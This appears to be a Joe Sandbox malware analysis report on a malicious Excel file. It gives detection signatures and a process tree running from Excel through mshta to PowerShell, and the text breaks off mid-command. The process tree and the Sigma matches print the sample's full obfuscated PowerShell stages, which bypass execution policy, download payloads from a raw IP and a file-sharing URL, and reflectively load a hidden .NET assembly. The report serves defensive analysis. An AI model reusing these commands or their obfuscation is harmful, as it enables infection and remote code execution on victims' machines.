Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swiftcopy.xla.xlsx

Overview

General Information

Sample name:Swiftcopy.xla.xlsx
Analysis ID:1564317
MD5:286b0bc4d52a6d17815a7724e03e980a
SHA1:e0a09d030b4f7d5839cb1b1a9c981d5c36e1ad47
SHA256:4b125219e5ef649021f0599e73be512a80d987ff8224036445c15fbd684c07c4
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3620 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3948 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3100 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3148 cmdline: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3328 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2504 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA.tmp" "c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 2764 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 2036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 3044INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0xf8704:$b2: ::FromBase64String(
    • 0xf9dd6:$b2: ::FromBase64String(
    • 0xfa521:$b2: ::FromBase64String(
    • 0xfadaa:$b2: ::FromBase64String(
    • 0xfb49e:$b2: ::FromBase64String(
    • 0x115a1e:$b2: ::FromBase64String(
    • 0x173c:$b3: ::UTF8.GetString(
    • 0x24d8e:$b3: ::UTF8.GetString(
    • 0x2572b:$b3: ::UTF8.GetString(
    • 0x262ab:$b3: ::UTF8.GetString(
    • 0x27c2e:$b3: ::UTF8.GetString(
    • 0x54d77:$b3: ::UTF8.GetString(
    • 0x711b9:$b3: ::UTF8.GetString(
    • 0x71b4c:$b3: ::UTF8.GetString(
    • 0x90b60:$b3: ::UTF8.GetString(
    • 0x914f6:$b3: ::UTF8.GetString(
    • 0x9263c:$b3: ::UTF8.GetString(
    • 0xa1266:$b3: ::UTF8.GetString(
    • 0xa1313:$b3: ::UTF8.GetString(
    • 0xa1c7d:$b3: ::UTF8.GetString(
    • 0xa6587:$b3: ::UTF8.GetString(
    Process Memory Space: powershell.exe PID: 2036JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 2036INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x45c8f:$b2: ::FromBase64String(
      • 0x4637f:$b2: ::FromBase64String(
      • 0x4e60d:$b2: ::FromBase64String(
      • 0x50592:$b2: ::FromBase64String(
      • 0x696ed:$b2: ::FromBase64String(
      • 0x69dd6:$b2: ::FromBase64String(
      • 0x9f9db:$b2: ::FromBase64String(
      • 0xa0243:$b2: ::FromBase64String(
      • 0xa602b:$b2: ::FromBase64String(
      • 0xaf26f:$b2: ::FromBase64String(
      • 0xb3066:$b2: ::FromBase64String(
      • 0xcbf56:$b2: ::FromBase64String(
      • 0xcc60d:$b2: ::FromBase64String(
      • 0xff3e3:$b2: ::FromBase64String(
      • 0xffacd:$b2: ::FromBase64String(
      • 0x100b3f:$b2: ::FromBase64String(
      • 0x135f55:$b2: ::FromBase64String(
      • 0x136695:$b2: ::FromBase64String(
      • 0x136f8e:$b2: ::FromBase64String(
      • 0x137839:$b2: ::FromBase64String(
      • 0x1381b0:$b2: ::FromBase64String(

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Base64 Encoded PowerShell Command Detected
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
      Sigma detected: File With Uncommon Extension Created By An Office Application
      Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3620, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].hta
      Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
      Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 